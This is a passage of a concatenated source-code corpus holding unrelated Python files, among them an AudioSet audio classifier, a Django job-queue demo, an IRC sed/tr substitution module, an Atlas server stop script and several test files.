, 'Wind_noise_(microphone)', 'Thunderstorm', 'Thunder', 'Water', 'Rain'
, 'Raindrop', 'Rain_on_surface', 'Stream', 'Waterfall', 'Ocean', 'WavesAND_surf'
, 'Steam', 'Gurgling', 'Fire', 'Crackle', 'Vehicle', 'BoatAND_Water_vehicle'
, 'SailboatAND_sailing_ship', 'RowboatAND_canoeAND_kayak'
, 'MotorboatAND_speedboat', 'Ship', 'Motor_vehicle_(road)', 'Car'
, 'Vehicle_hornAND_car_hornAND_honking', 'Toot', 'Car_alarm'
, 'Power_windowsAND_electric_windows', 'Skidding', 'Tire_squeal'
, 'Car_passing_by', 'Race_carAND_auto_racing', 'Truck', 'Air_brake'
, 'Air_hornAND_truck_horn', 'Reversing_beeps'
, 'Ice_cream_truckAND_ice_cream_van', 'Bus', 'Emergency_vehicle'
, 'Police_car_(siren)', 'Ambulance_(siren)'
, 'Fire_engineAND_fire_truck_(siren)', 'Motorcycle'
, 'Traffic_noiseAND_roadway_noise', 'Rail_transport', 'Train', 'Train_whistle'
, 'Train_horn', 'Railroad_carAND_train_wagon', 'Train_wheels_squealing'
, 'SubwayAND_metroAND_underground', 'Aircraft', 'Aircraft_engine'
, 'Jet_engine', 'PropellerAND_airscrew', 'Helicopter'
, 'Fixed-wing_aircraftAND_airplane', 'Bicycle', 'Skateboard', 'Engine'
, 'Light_engine_(high_frequency)', "Dental_drillAND_dentist's_drill"
, 'Lawn_mower', 'Chainsaw', 'Medium_engine_(mid_frequency)'
, 'Heavy_engine_(low_frequency)', 'Engine_knocking', 'Engine_starting'
, 'Idling', 'AcceleratingAND_revvingAND_vroom', 'Door', 'Doorbell', 'Ding-dong'
, 'Sliding_door', 'Slam', 'Knock', 'Tap', 'Squeak', 'Cupboard_open_or_close'
, 'Drawer_open_or_close', 'DishesAND_potsAND_and_pans'
, 'CutleryAND_silverware', 'Chopping_(food)', 'Frying_(food)'
, 'Microwave_oven', 'Blender', 'Water_tapAND_faucet'
, 'Sink_(filling_or_washing)', 'Bathtub_(filling_or_washing)', 'Hair_dryer'
, 'Toilet_flush', 'Toothbrush', 'Electric_toothbrush', 'Vacuum_cleaner'
, 'Zipper_(clothing)', 'Keys_jangling', 'Coin_(dropping)', 'Scissors'
, 'Electric_shaverAND_electric_razor', 'Shuffling_cards', 'Typing'
, 'Typewriter', 'Computer_keyboard', 'Writing', 'Alarm', 'Telephone'
, 'Telephone_bell_ringing', 'Ringtone', 'Telephone_dialingAND_DTMF'
, 'Dial_tone', 'Busy_signal', 'Alarm_clock', 'Siren', 'Civil_defense_siren'
, 'Buzzer', 'Smoke_detectorAND_smoke_alarm', 'Fire_alarm', 'Foghorn', 'Whistle'
, 'Steam_whistle', 'Mechanisms', 'RatchetAND_pawl', 'Clock', 'Tick', 'Tick-tock'
, 'Gears', 'Pulleys', 'Sewing_machine', 'Mechanical_fan', 'Air_conditioning'
, 'Cash_register', 'Printer', 'Camera', 'Single-lens_reflex_camera', 'Tools'
, 'Hammer', 'Jackhammer', 'Sawing', 'Filing_(rasp)', 'Sanding', 'Power_tool'
, 'Drill', 'Explosion', 'GunshotAND_gunfire', 'Machine_gun', 'Fusillade'
, 'Artillery_fire', 'Cap_gun', 'Fireworks', 'Firecracker', 'BurstAND_pop'
, 'Eruption', 'Boom', 'Wood', 'Chop', 'Splinter', 'Crack', 'Glass'
, 'ChinkAND_clink', 'Shatter', 'Liquid', 'SplashAND_splatter', 'Slosh', 'Squish'
, 'Drip', 'Pour', 'TrickleAND_dribble', 'Gush', 'Fill_(with_liquid)', 'Spray'
, 'Pump_(liquid)', 'Stir', 'Boiling', 'Sonar', 'Arrow'
, 'WhooshAND_swooshAND_swish', 'ThumpAND_thud', 'Thunk', 'Electronic_tuner'
, 'Effects_unit', 'Chorus_effect', 'Basketball_bounce', 'Bang', 'SlapAND_smack'
, 'WhackAND_thwack', 'SmashAND_crash', 'Breaking', 'Bouncing', 'Whip', 'Flap'
, 'Scratch', 'Scrape', 'Rub', 'Roll', 'Crushing', 'CrumplingAND_crinkling'
, 'Tearing', 'BeepAND_bleep', 'Ping', 'Ding', 'Clang', 'Squeal', 'Creak', 'Rustle'
, 'Whir', 'Clatter', 'Sizzle', 'Clicking', 'Clickety-clack', 'Rumble', 'Plop'
, 'JingleAND_tinkle', 'Hum', 'Zing', 'Boing', 'Crunch', 'Silence', 'Sine_wave'
, 'Harmonic', 'Chirp_tone', 'Sound_effect', 'Pulse', 'InsideAND_small_room'
, 'InsideAND_large_room_or_hall', 'InsideAND_public_space'
, 'OutsideAND_urban_or_manmade', 'OutsideAND_rural_or_natural'
, 'Reverberation', 'Echo', 'Noise', 'Environmental_noise', 'Static', 'Mains_hum'
, 'Distortion', 'Sidetone', 'Cacophony', 'White_noise', 'Pink_noise'
, 'Throbbing', 'Vibration', 'Television', 'Radio', 'Field_recording']
_TOTAL_NUM_CLASS = 527
__FILE_CLASS_LABELS = '../audiosetdl/class_labels_indices.csv'
# MODEL_PATH = 'work/models/main/balance_type=balance_in_batch/model_type=decision_level_average_pooling/'
MODEL_PATH = 'checkpoints_transfer/'
meta_path = MODEL_PATH + 'model.ckpt-{}.meta'.format(40000)
model_path = MODEL_PATH + 'model.ckpt-{}'.format(40000)
_DURATION = 3 # seconds
def print_prediction(out, mfcclen):
# print('mfcclen', mfcclen)
sorted_out = np.argsort(-out)
# print(out[sorted_out[:100]])
for i in range(3):
prob = out[sorted_out[i]]
if prob > 0.8 and (sorted_out[i] != 0):
print("\033[1;32;40m{} \t prob: {}\033[0m".format (labels[sorted_out[i]], prob))
elif prob > 0.3:
print('{} \t prob: {}'.format(labels[sorted_out[i]], prob))
# print('')
def get_name_list(audio_path):
result = []
flist = os.listdir(audio_path)
for afile in flist:
if os.path.basename(afile).split('.')[-1] == 'wav': # name.wav.short bug fix
afile_path = bytes(os.path.join(audio_path, afile), encoding='utf-8')
result.append(afile_path)
return result
def raw2mfcc(raw_wav_data):
raw_wav_data = np.array(raw_wav_data)
try:
amfcc = mfcc.waveform_to_examples(raw_wav_data / 32768.0, 16000)
alen = amfcc.shape[0]
if (alen < 240):
amfcc = np.concatenate((amfcc, np.zeros(shape=((240 - alen), amfcc.shape[1]))), axis=0)
elif (alen > 240):
alen = 240
amfcc = amfcc[:240]
except Exception as e:
print('axs')
print('Error while processing audio: {} '.format(e))
return amfcc, alen
def core(args):
data_dir = args.data_dir
workspace = args.workspace
filename = args.filename
model_type = args.model_type
# model = args.model
q = mp.Queue (maxsize=20)
# Load data
load_time = time.time()
# tensorflow graph
saver = tf.train.import_meta_graph(meta_path) # import graph
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
with tf.Session(config=config) as sess:
saver.restore(sess, model_path) # graph = tf.get_default_graph()
# Locate all the tensors and ops we need for the training loop.
features_tensor = sess.graph.get_tensor_by_name(
vggish_params.INPUT_TENSOR_NAME)
sequence_length_tensor = sess.graph.get_tensor_by_name(
'vggish/input_sequence_length:0')
output_tensor = sess.graph.get_tensor_by_name(
'mix/prediction:0')
mp.Process (target = audio_sample.core, args = (q,)).start() # start audio sample
combined = []
_960ms = []
while True:
_960ms = q.get()
# print(q.qsize())
while q.qsize() > 0:
_960ms = q.get()
combined += _960ms
if (len(combined) / audio_sample.buf_size) >= _DURATION:
# print('combined', len(combined))
test_x_mfcc, test_x_len = raw2mfcc(combined)
[[output], sl] = sess.run([output_tensor, sequence_length_tensor], feed_dict={features_tensor: [test_x_mfcc,], sequence_length_tensor: [test_x_len,]}) #output = model.predict(input)
print_prediction(output, sl)
combined[0:len(_960ms)] = []
| StarcoderdataPython |
128957 | import time
from datetime import timedelta
from django.db import transaction
from dpq.queue import AtLeastOnceQueue
from dpq.decorators import repeat
def foo(queue, job):
transaction.on_commit(lambda: 1/0)
print('foo {}'.format(job.args))
def timer(queue, job):
print(time.time() - job.args['time'])
def n_times(queue, job):
print('n_times', job.args['count'])
if job.args['count'] > 1:
queue.enqueue(job.task, {'count': job.args['count'] - 1})
@repeat(timedelta(seconds=1))
def repeater(queue, job):
print('repeat {}; eta {}'.format(job, job.execute_at))
def long_task(queue, job):
print('job started: {}'.format(job.id))
time.sleep(10)
print('job finished: {}'.format(job.id))
queue = AtLeastOnceQueue(
notify_channel='channel',
tasks={
'foo': foo,
'timer': timer,
'repeater': repeater,
'n_times': n_times,
'long_task': long_task,
},
)
| StarcoderdataPython |
4829892 | <filename>20-no-commitment/plugins-src/words1.py
import sys, re, string
def extract_words(path_to_file):
"""
Takes a path to a file and returns the non-stop
words, after properly removing nonalphanumeric chars
and normalizing for lower case
"""
if type(path_to_file) is not str or not path_to_file:
return []
try:
with open(path_to_file) as f:
str_data = f.read()
except IOError as e:
print "I/O error({0}) when opening {1}: {2}".format(e.errno, path_to_file, e.strerror)
return []
pattern = re.compile('[\W_]+')
word_list = pattern.sub(' ', str_data).lower().split()
try:
with open('../stop_words.txt') as f:
stop_words = f.read().split(',')
except IOError as e:
print "I/O error({0}) when opening ../stops_words.txt: {1}".format(e.errno, e.strerror)
return []
stop_words.extend(list(string.ascii_lowercase))
return [w for w in word_list if not w in stop_words]
| StarcoderdataPython |
3335486 | <reponame>victorjourne/ezibpy
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# ezIBpy: a Pythonic Client for Interactive Brokers API
# https://github.com/ranaroussi/ezibpy
#
# Copyright 2015-2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__version__ = "1.12.70"
__author__ = "<NAME>"
__all__ = ['ezIBpy', 'dataTypes', 'utils']
from ezibpy.ezibpy import ezIBpy
from ezibpy.utils import dataTypes
import ezibpy.utils as utils
| StarcoderdataPython |
107774 | <reponame>Saicharan67/Interview-Coding-Questions
"""
Given an Array of non-negative intergers find if we can divide the array into two sub arrays of equal sum
"""
dp = ([[False for i in range(50)]
for i in range(10)])
def EqualSumDp(a, n):
s = sum(a)
if s & 1:
return False
s = s//2
for j in range(n+1):
dp[j][0] = True
for j in range(1, s+1):
dp[0][j] = False
for i in range(1, n+1):
for j in range(1, s+1):
dp[i][j] = dp[i-1][j]
if a[i-1] <= j:
dp[i][j] |= dp[i-1][j-a[i-1]]
print(dp)
return dp[n][s]
print(EqualSumDp([1, 5, 5, 11], 4))
| StarcoderdataPython |
147497 | <gh_stars>10-100
import csv
symptomlist = ['suicidal','hallucinations auditory','irritable mood','agitation']
disease_ = []
disease_list = []
for s in symptomlist:
with open("bucketmap.csv","rb") as csvfile:
reader = csv.reader(csvfile)
for row in reader:
if s in row:
disease_.append((row[0],s))
disease_list.append(row[0])
with open("node.csv","wb") as csvfile:
writer = csv.writer(csvfile)
writer.writerow(["Id","Label","Attribute"])
for n in symptomlist:
writer.writerow([n,n,"Symptom"])
for d in disease_list:
writer.writerow([d,d,"Disease"])
with open("edge.csv","wb") as csvfile:
writer = csv.writer(csvfile)
writer.writerow(["Source","Target"])
for d in disease_:
dis,sym = d
writer.writerow([dis,sym]) | StarcoderdataPython |
1677920 | <gh_stars>10-100
from .modules import Module, Dropout
| StarcoderdataPython |
185858 |
from opymize import Variable, LinOp
from opymize.linear.sparse import idxop, einsumop
import numba
import numpy as np
from numpy.linalg import norm
try:
import opymize.tools.gpu
from opymize.tools.gpu import prepare_kernels
from pkg_resources import resource_stream
except:
# no cuda support
pass
def indexedmult_prepare_gpu(B, P, x, type_t="double"):
J = B.shape[0]
K = x[0]['shape'][1]
L = B.shape[2]
M = B.shape[1]
N = x[0]['shape'][0]
constvars = {
'J': J, 'K': K, 'L': L, 'M': M, 'N': N,
'P': P, 'B': B, 'TYPE_T': type_t
}
files = [resource_stream('opymize.linear', 'indexed.cu')]
templates = [
("indexedmult", "PP", (N, J, M), (32, 24, 1)),
("indexedmultadj", "PP", (N, 1, 1), (512, 1, 1))
]
return prepare_kernels(files, templates, constvars)
class IndexedMultAdj(LinOp):
""" for k,l,i do (Ax)[i,P[j,l]] -= \sum_m B[j,m,l] * x[j,i,m] """
def __init__(self, K, N, P, B, adjoint=None):
LinOp.__init__(self)
assert P.shape[0] == B.shape[0]
assert P.shape[1] == B.shape[2]
self.x = Variable((B.shape[0],N,B.shape[1]))
self.y = Variable((N,K))
self.P = P
self.B = B
if adjoint is None:
self.adjoint = IndexedMult(K, N, B, P, adjoint=self)
else:
self.adjoint = adjoint
self._kernel = None
self.spmat = self.adjoint.spmat.T
def prepare_gpu(self, kernels=None, type_t="double"):
if self._kernel is not None: return
if kernels is None:
kernels = indexedmult_prepare_gpu(self.B, self.P, self.y, type_t=type_t)
self._kernel = kernels['indexedmultadj']
self.adjoint.prepare_gpu(kernels, type_t=type_t)
def _call_gpu(self, x, y=None, add=False):
assert y is not None
if not add: y.fill(0.0)
self._kernel(x, y)
class IndexedMult(LinOp):
""" (Ax)[j,i,m] -= \sum_l B[j,m,l] * x[i,P[j,l]] """
def __init__(self, K, N, B, P, adjoint=None):
LinOp.__init__(self)
assert P.shape[0] == B.shape[0]
assert P.shape[1] == B.shape[2]
self.x = Variable((N,K))
self.y = Variable((B.shape[0],N,B.shape[1]))
self.P = P
self.B = B
self._kernel = None
spP = [idxop(Pj, K) for Pj in P]
spP = einsumop("jlk,ik->jil", spP, dims={ 'i': N })
self.spmat = -einsumop("jml,jil->jim", B, dims={ 'i': N }).dot(spP)
if adjoint is None:
self.adjoint = IndexedMultAdj(K, N, P, B, adjoint=self)
else:
self.adjoint = adjoint
def prepare_gpu(self, kernels=None, type_t="double"):
if self._kernel is not None: return
if kernels is None:
kernels = indexedmult_prepare_gpu(self.B, self.P, self.x, type_t=type_t)
self._kernel = kernels['indexedmult']
self.adjoint.prepare_gpu(kernels, type_t=type_t)
def _call_gpu(self, x, y=None, add=False):
assert y is not None
if not add: y.fill(0.0)
self._kernel(x, y)
| StarcoderdataPython |
50526 | <filename>modules/sed.py
import re
import string
from util.esc import unescape
"""
The 'tr' implementation was based on github:ikegami-yukino/python-tr.
"""
all = [chr(i) for i in range(256)]
def mklist(src):
src = src.replace("\\/", "/") \
.replace("[:upper:]", string.ascii_uppercase) \
.replace("[:lower:]", string.ascii_lowercase) \
.replace("[:alpha:]", string.ascii_letters) \
.replace("[:digit:]", string.digits) \
.replace("[:xdigit:]", string.hexdigits) \
.replace("[:alnum:]", string.digits + string.ascii_letters) \
.replace("[:blank:]", string.whitespace) \
.replace("[:punct:]", string.punctuation) \
.replace("[:cntrl:]", "".join([i for i in all if i not in string.printable])) \
.replace("[:print:]", string.printable)
lst = []
bs = False
hy = False
for ch in src:
if ch == "\\":
if not bs: bs = True
continue
elif ch == "-" and not bs:
hy = True
continue
elif hy:
lst.extend(range(lst[-1] + 1, ord(ch)))
lst.append(ord(ch))
bs = False
hy = False
return "".join([chr(i) for i in lst])
def squeeze(lst, src):
for ch in lst:
src = re.sub(ch + r"{2,}", ch, src)
return src
def tr(frm, to, src):
return src.translate(str.maketrans(frm, to))
def create_sub_function(rhs):
return lambda matchobj: "\x16{0}\x16".format(rhs)
class SedModule:
subre = re.compile(r"^(?:(\S+)[:,]\s)?(?:s|(.+?)/s)/((?:\\/|[^/])+)\/((?:\\/|[^/])*?)/([gixs]{0,4})?(?: .*)?$")
trre = re.compile("^(?:(\S+)[:,]\s)?(?:y|(.+?)/y)/((?:\\/|[^/])+)\/((?:\\/|[^/])*?)/([cds]{0,3})?(?: .*)?$")
def __init__(self, circa):
self.circa = circa
self.events = {
"message": [self.sub, self.tr]
}
self.docs = "Performs sed's s/// and y/// functions.\n" \
"[<nick>: ][<search>/]s/<pattern>/<replacement>/[gixs] → performs s/// on the last line in nick's messages that matches the search pattern.\n" \
"[<nick>: ][<search>/]y/<set1>/<set2>/[cds] → performs y/// on the last line in nick's messages that matches the search pattern.\n" \
"See online docs for more info."
def sub(self, fr, to, msg, m):
match = self.subre.match(msg)
if match:
target, search, lhs, rhs, flags = match.groups()
user = target or fr
msgs = reversed(self.circa.channels[to[1:]].users[user].messages)
msgs = [line for line in msgs if not self.subre.match(line)]
if search:
msgs = [line for line in msgs if search.lower() in line.lower()]
msgs = [line for line in msgs if re.search(lhs, line)]
if len(msgs):
u = msgs[0]
f = 0
if "i" in flags: f |= re.I
rhs = rhs.replace("\\/", "/")
rhs = re.sub(r"(?<!\\)(\\)(?=\d+|g<\w+>)", r"\\\\", rhs)
rhs = unescape(rhs)
count = int("g" not in flags)
t = u[len("\x01ACTION "):] if u.startswith("\x01ACTION ") else u
t = re.sub(lhs, create_sub_function(rhs), t, count=count, flags=f)
t = t.replace("\n", " ").replace("\r", " ")
if u.startswith("\x01ACTION ") or t.startswith("\x01ACTION "):
if t.startswith("\x01ACTION "):
t = t[len("\x01ACTION "):]
t = t.replace("\x01", "")
self.circa.say(to, "\x02* {0}\x02 {1}".format(user, t))
else:
self.circa.say(to, "<{0}> {1}".format(user, t))
def tr(self, fr, to, msg, m):
match = self.trre.match(msg)
if match:
target, search, lhs, rhs, flags = match.groups()
user = target or fr
msgs = reversed(self.circa.channels[to[1:]].users[user].messages)
msgs = [line for line in msgs if not self.trre.match(line)]
if search:
msgs = [line for line in msgs if search.lower() in line.lower()]
lhslst = mklist(lhs)
rhslst = unescape(mklist(rhs.replace("\\/", "/")).replace("\\", "\\\\"))
find = [c for c in all if c not in lhslst] if "c" in flags else lhslst
msgs = [line for line in msgs if len(set(line) & set(find))]
if len(msgs):
u = msgs[0]
t = u[len("\x01ACTION "):] if u.startswith("\x01ACTION ") else u
if "d" in flags:
todel = lhslst[len(rhslst):]
lhslst = lhslst[:len(rhslst)]
t = "".join([c for c in t if c not in todel])
else:
if len(rhslst) < len(lhslst):
rhslst += "".join([rhslst[-1]] * (len(lhslst) - len(rhslst)))
else:
rhslst = rhslst[:len(lhslst)]
t = tr(lhslst, rhslst, t)
if "s" in flags:
t = squeeze(rhslst, t)
t = t.replace("\n", " ").replace("\r", " ")
if u.startswith("\x01ACTION "):
t = t.replace("\x01", "")
self.circa.say(to, "\x02* {0}\x02 {1}".format(user, t))
else:
self.circa.say(to, "<{0}> {1}".format(user, t))
module = SedModule
| StarcoderdataPython |
3363177 | <filename>distro/src/bin/atlas_stop.py
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from signal import SIGTERM
import sys
import traceback
import atlas_config as mc
def main():
metadata_home = mc.metadataDir()
confdir = mc.dirMustExist(mc.confDir(metadata_home))
mc.executeEnvSh(confdir)
piddir = mc.dirMustExist(mc.logDir(metadata_home))
metadata_pid_file = mc.pidFile(metadata_home)
try:
pf = file(metadata_pid_file, 'r')
pid = int(pf.read().strip())
pf.close()
except:
pid = None
if not pid:
sys.stderr.write("No process ID file found. Server not running?\n")
return
os.kill(pid, SIGTERM)
# assuming kill worked since process check on windows is more involved...
if os.path.exists(metadata_pid_file):
os.remove(metadata_pid_file)
if __name__ == '__main__':
try:
returncode = main()
except Exception as e:
print "Exception: %s " % str(e)
print traceback.format_exc()
returncode = -1
sys.exit(returncode)
| StarcoderdataPython |
3228799 | import numpy as np
import tensorflow as tf
from unittest import TestCase
from .context import conv_gp
from conv_gp.views import RandomPartialView, FullView
from conv_gp.mean_functions import PatchwiseConv2d, Conv2dMean
class TestMeanFunction(TestCase):
def test_patchwise_conv(self):
filter_size = 5
patch_count = 9
view = RandomPartialView((28, 28), filter_size, 1, patch_count)
mean = PatchwiseConv2d(filter_size, 1, 3, 3)
images = np.random.randn(10, 28, 28, 1)
PNL_patches = view.extract_patches_PNL(images)
sess = mean.enquire_session()
mean_patches = sess.run(mean(PNL_patches))
self.assertEqual(mean_patches.shape[0], 10)
self.assertEqual(mean_patches.shape[1], 9)
def test_full_patchwise_conv(self):
filter_size = 5
patch_count = 9
view = FullView((28, 28), filter_size, 1)
mean = PatchwiseConv2d(filter_size, 1, 24, 24)
images = np.random.randn(10, 28, 28, 1)
PNL_patches = view.extract_patches_PNL(images)
sess = mean.enquire_session()
mean_patches = sess.run(mean(PNL_patches))
self.assertEqual(mean_patches.shape[0], 10)
self.assertEqual(mean_patches.shape[1], 576)
conv_mean = Conv2dMean(filter_size, 1)
conv_mean_patches = sess.run(conv_mean(images))
self.assertEqual(conv_mean_patches.shape, mean_patches.shape)
def test_feature_maps(self):
full_conv = Conv2dMean(3, 1, 3)
random_input = np.random.randn(4, 28, 28, 1)
sess = full_conv.enquire_session()
convolved = sess.run(full_conv(random_input))
self.assertEqual(convolved.shape, (4, 676*3))
| StarcoderdataPython |
82060 | <reponame>faragher/LibreSignage
#!/usr/bin/env python3
#
# Main test unit class.
#
import requests;
from requests.models import Response;
from typing import Callable, Dict, Any, List;
from resptypes import RespVal;
from uniterr import *;
import json;
import sys;
import re;
class Unit:
# HTTP methods.
METHOD_GET: str = "GET";
METHOD_POST: str = "POST";
# Response mimetypes.
MIME_TEXT: str = "text/plain";
MIME_JSON: str = "application/json";
resp_mime: str = "";
def __init__( self,
host: str,
name: str,
url: str,
request_method: str,
preexec: Callable[[], Dict[str, Any]],
postexec: Callable[[bool, Response], None],
data_request: Any,
headers_request: Dict[str, str],
cookies_request: Any,
data_expect_strict: bool,
headers_expect_strict: bool,
status_expect: int,
data_expect: Any,
headers_expect: Dict[str, RespVal]) -> None:
self.host = host;
self.name = name;
self.url = url;
if (request_method == self.METHOD_GET or
request_method == self.METHOD_POST):
self.request_method = request_method;
self.preexec = preexec;
self.postexec = postexec;
self.data_request = data_request;
self.headers_request = headers_request;
self.cookies_request = cookies_request;
self.headers_expect_strict = headers_expect_strict;
self.data_expect_strict = data_expect_strict;
self.status_expect = status_expect;
self.data_expect = data_expect;
self.headers_expect = headers_expect;
def run(self) -> None:
ret: List[UnitError] = [];
req = Response();
status = True;
data: str = "";
params: Dict[str, str] = {};
print("== " + self.name + ": ");
# Run the preexec function and set the
# returned values.
if (self.preexec):
print("[INFO] Running preexec.");
tmp = self.preexec();
if (tmp and 'data_request' in tmp):
self.headers_request.update(
tmp['data_request']
);
if (tmp and 'headers_request' in tmp):
self.headers_request.update(
tmp['headers_request']
);
# Convert data to the correct format.
req_ct = self.get_req_header('Content-Type');
if (self.request_method == self.METHOD_POST):
params = {};
if (req_ct == self.MIME_JSON):
data = json.dumps(self.data_request);
else:
data = self.data_request;
elif (self.request_method == self.METHOD_GET):
data = "";
params = self.data_request;
# Send the correct request.
try:
req = requests.request(
method = self.request_method,
url = self.host + self.url,
data = data,
params = params,
cookies = self.cookies_request,
headers = self.headers_request
);
except requests.exceptions.ConnectionError:
print(
"[ERROR] Failed to connect to server. " +
"Is the server running?"
);
sys.exit(1);
# Store the response mimetype.
resp_ct = req.headers['Content-Type'];
if (not resp_ct or
re.match('^' + self.MIME_TEXT + '.*', resp_ct)):
self.resp_mime = self.MIME_TEXT;
elif (re.match('^' + self.MIME_JSON + '.*', resp_ct)):
self.resp_mime = self.MIME_JSON;
else:
print(
"Unknown response mimetype: '" + resp_ct +
"'. Using '" + self.MIME_TEXT + "'."
);
self.resp_mime = self.MIME_TEXT;
# Validate response.
ret += self.handle_status(req);
ret += self.handle_headers(req);
ret += self.handle_data(req);
if (len(ret)):
# Print errors.
for err in ret:
err.printerr();
print("############ Information ############\n");
# Dump request and response.
print("======= Request =======");
print(">> URL: " + req.url);
print(">> Header dump:");
print(json.dumps(
self.headers_request,
indent=4
));
print(">> Body dump:");
print(json.dumps(
self.data_request,
indent=4
));
print("========================\n");
print("======= Response =======");
print(">> Status code: " + str(req.status_code));
print(">> Header dump:");
print(json.dumps(
dict(req.headers.items()),
indent=4
));
print(">> Body dump:");
if (self.resp_mime == self.MIME_JSON):
try:
print(json.dumps(
req.json(),
indent=4
));
except json.decoder.JSONDecodeError:
print(">>> JSON decoding " +
"failed. Printing " +
"raw dump.");
print(req.text);
elif (self.resp_mime == self.MIME_TEXT):
print(req.text);
else:
raise Exception(
"Unknown response mime type."
);
print("========================\n")
print("#####################################");
# Run the postexec function.
if (self.postexec):
print("[INFO] Running postexec.");
self.postexec(len(ret) == 0, req);
def get_req_header(self, header):
if (header in self.headers_request):
return self.headers_request[header];
else:
return None;
def handle_status(self, req: Response) -> List[UnitError]:
if not self.status_expect == req.status_code:
return [UnitStatusError(
req.status_code,
self.status_expect
)];
else:
return [];
def handle_headers(self, req: Response) -> List[UnitError]:
#
# Compare the response headers of 'req' with the
# expected headers.
#
ret: List[UnitError] = [];
r = req.headers;
e = self.headers_expect;
# Check expected header keys.
if self.headers_expect_strict:
if not set(r.keys()) == set(e.keys()):
ret.append(UnitHeaderKeyError(
r.keys(), e.keys(), True
));
return ret;
else:
if not (set(r.keys()) & set(e.keys())
== set(e.keys())):
ret.append(UnitHeaderKeyError(
r.keys(), e.keys(), False
));
return ret;
# Check expected header values.
for k in e.keys():
if not (e[k].validate(r[k])):
ret.append(UnitHeaderError(
k, r[k], e[k]
));
return ret;
def handle_data(self, req: Response) -> List[UnitError]:
#
# Handle response data.
#
if (self.resp_mime == self.MIME_JSON):
return self.handle_json(req);
elif (self.resp_mime == self.MIME_TEXT):
return self.handle_text(req);
def handle_json(self, req: Response) -> List[UnitError]:
#
# Compare the response JSON of 'req' with the
# expected JSON response.
#
ret: List[UnitError] = [];
r = None;
e = self.data_expect;
# Parse JSON response.
try:
r = req.json();
except ValueError:
ret.append(UnitDataTypeError("JSON").printerr());
return ret;
# Check expected keys.
if (self.data_expect_strict):
if not (set(e.keys()) == set(r.keys())):
ret.append(UnitJsonDataKeyError(
r.keys(), e.keys(), True
));
return ret;
else:
if not (set(e.keys()) & set(r.keys())
== set(e.keys())):
ret.append(UnitJsonDataKeyError(
r.keys(), e.keys(), False
));
return ret;
# Check expected data.
for k in e.keys():
if not e[k].validate(r[k]):
ret.append(UnitJsonDataError(
k, r[k], e[k]
));
return ret;
def handle_text(self, req: Response) -> List[UnitError]:
if self.data_expect == None:
return [];
elif not self.data_expect.validate(req.text):
return [UnitTextDataError(
req.text,
self.data_expect
)];
return [];
def run_tests(tests: list) -> None:
for t in tests:
t.run();
| StarcoderdataPython |
3306935 | # Copyright 2020 Curtin University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Author: <NAME>
import os
import unittest
from click.testing import CliRunner
from observatory.platform.cli.generate_command import GenerateCommand
class TestGenerateCommand(unittest.TestCase):
def test_generate_fernet_key(self):
cmd = GenerateCommand()
# Test that keys are random
num_keys = 100
random_keys = [cmd.generate_fernet_key() for _ in range(num_keys)]
self.assertEqual(len(set(random_keys)), num_keys)
# Test that keys have length of 44
expected_key_len = 44
[self.assertEqual(expected_key_len, len(key)) for key in random_keys]
def test_generate_local_config(self):
cmd = GenerateCommand()
config_path = 'config.yaml'
with CliRunner().isolated_filesystem():
cmd.generate_local_config(config_path)
self.assertTrue(os.path.exists(config_path))
def test_generate_terraform_config(self):
cmd = GenerateCommand()
config_path = 'config-terraform.yaml'
with CliRunner().isolated_filesystem():
cmd.generate_terraform_config(config_path)
self.assertTrue(os.path.exists(config_path))
| StarcoderdataPython |
57323 | """test_cvvidproc.py
First, shows image of ISCO pump setup, closes when user clicks spacebar
Second, shows first frame of video of inner stream, closes when user clicks spacebar
Third, computes background of samples video. Should look like first frame^ w/o objects.
"""
import time
import cv2
import cvvidproc
import sys
sys.path.append('../src/')
import cvimproc.improc as improc
# test 0: shows image of isco pump
image = cv2.imread('../input/images/img.jpg')
cv2.imshow('Click spacebar', image)
cv2.waitKey(0)
cv2.destroyAllWindows()
# test 1: shows frame from vide of inner stream
vid_path = '../input/videos/vid2.mp4'
# loads video
cap = cv2.VideoCapture(vid_path)
ret, frame = cap.read()
cv2.imshow('Click spacebar', frame)
cv2.waitKey(0)
cv2.destroyAllWindows()
cap.release()
# test 2: computes background from video and shows result
bkgd = improc.compute_bkgd_med_thread(vid_path, num_frames=1000, max_threads=12)
cv2.imshow('Background -- click spacebar', bkgd)
cv2.waitKey(0)
cv2.destroyAllWindows()
# compare to previous, unoptimized, fully Python background algorithm in "Kornfield/ANALYSIS/improc-dev/bkg_alg_koe/test_python_speed.py"
| StarcoderdataPython |
3295784 | from pepmass.glycomass import GlycanNode
from print_tree import print_tree
class print_glycan_struct(print_tree):
def __init__(self, glycan, **kwargs):
if isinstance(glycan, str):
glycan = GlycanNode.from_str(glycan)
super(print_glycan_struct, self).__init__(glycan, **kwargs)
def get_children(self, node):
return node.children or []
def get_node_str(self, node):
return str(node.monosaccharide)
if __name__ == '__main__':
print_glycan_struct('(N(N(H(H(H(H)))(H(H(H(H)))))))')
print_glycan_struct('(N(N(H(H)(H(H(H))(H(H(H)))))))')
print_glycan_struct('(N(N(H(H(H(H)))(H(H)(H(H))))))')
| StarcoderdataPython |
74165 | <gh_stars>0
# -*- coding: utf-8 -*-
import base64
